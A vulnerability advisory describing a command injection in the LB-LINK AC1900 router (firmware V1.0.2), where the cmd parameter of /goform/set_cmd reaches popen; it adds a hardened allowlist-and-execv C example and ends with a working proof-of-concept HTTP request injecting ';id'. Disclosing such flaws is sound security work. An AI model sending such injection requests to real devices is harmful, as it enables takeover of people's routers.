Affected Version

Vendor: LBLINK
Product: AC1900
Firmware Version: V1.0.2

Firmware Download Link

https://www.b-link.net.cn/downloads_16.html

Vulnerability Description

In the LB-LINK AC1900 router with firmware version V1.0.2, the route /goform/set_cmd has a command injection vulnerability, which may lead to remote arbitrary code execution.

Vulnerability Detail

In sub_44F18C, the backend handler for the route /goform/set_cmd, the parameter cmd is retrieved from the HTTP message through the function websGetVar. The parameter is then serialized as JSON and passed to the library function bs_setCmd.

In the library function set_cmd, the cmd field is extracted from the JSON data and passed into popen for command execution. An attacker can pass in any cmd parameter to achieve remote code execution.
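
A hardened counterpart to the popen path described above, as an added example that is not the vendor's code: the cmd value is matched exactly against a fixed allowlist and run with execv, so no shell ever parses it. The action names, binary paths and function names (resolve_cmd, run_cmd) are assumptions for illustration.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern described in the advisory: popen(cmd, "r") hands the
 * request-supplied string to /bin/sh, so ';' and other metacharacters
 * start additional commands. */

/* Hypothetical allowlist: each accepted cmd value maps to a fixed argv. */
struct allowed_cmd {
    const char *name;           /* exact value accepted in the cmd field */
    const char *const argv[4];  /* fixed, NULL-terminated argument vector */
};

static const struct allowed_cmd ALLOWED[] = {
    { "uptime",  { "/usr/bin/uptime", NULL } },        /* assumed path */
    { "ifstate", { "/sbin/ifconfig", "br0", NULL } },  /* assumed path and interface */
};

/* Return the fixed argv for an exact allowlisted name, or NULL to reject. */
const char *const *resolve_cmd(const char *cmd)
{
    if (cmd == NULL)
        return NULL;
    for (size_t i = 0; i < sizeof(ALLOWED) / sizeof(ALLOWED[0]); i++)
        if (strcmp(cmd, ALLOWED[i].name) == 0)
            return ALLOWED[i].argv;
    return NULL;
}

/* Run an allowlisted action without a shell.
 * Returns the child's exit status, or -1 if rejected or on failure. */
int run_cmd(const char *cmd)
{
    const char *const *argv = resolve_cmd(cmd);
    if (argv == NULL)
        return -1;                      /* unknown value: nothing is executed */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);  /* request data never reaches argv */
        _exit(127);                           /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this shape the PoC body's value is rejected before any process is created, because it matches no allowlisted name.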

PoC

POST /goform/set_cmd HTTP/1.1
Host: 192.168.16.1
Content-Length: 12
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Origin: http://192.168.16.1
Referer: http://192.168.16.1/admin/more.html
Accept-Encoding: gzip, deflate, br
Cookie: platform=0; user=admin
Connection: keep-alive

cmd=ls -l;id